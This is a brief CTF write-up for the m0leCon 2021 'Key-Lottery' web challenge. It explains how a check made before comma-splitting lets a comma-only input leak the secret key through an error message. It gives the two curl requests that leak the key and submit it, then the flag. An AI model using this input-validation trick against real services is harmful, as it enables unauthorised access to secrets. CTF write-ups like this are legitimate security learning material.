c0r3dump CTF writeups

CTF writeups by c0r3dump.

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m0leCon 2021 CTF Teaser - Key-Lottery


Just guess the correct key an you’ll win a flag!




The key is to send in multiple ‘,’ characters and line 49 ...f"got empty key set: {repr(key_set)}"... should return the key_set object as a string, because the check len(keys) == 0 is before the keys are split up by the ‘,’ characters. After the split, the server checks again len(keys) > 0 and this is false now.

> curl 'http://key-lottery.challs.m0lecon.it/guess' \
  --data-raw 'keys=%2C%2C%2C%2C%2C%2C%2C%2C%2C%2C%2C%2C%2C%2C%2C%2C'
got empty key set: {'p1c4XEM2yDQwzCjtYco2tj6toB1A2KXT'}

Now we have to upload the received key on the given webpage:

> curl 'http://key-lottery.challs.m0lecon.it/guess' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-raw 'keys=p1c4XEM2yDQwzCjtYco2tj6toB1A2KXT' \

Flag: ptm{u_guessed_it_alright_mate}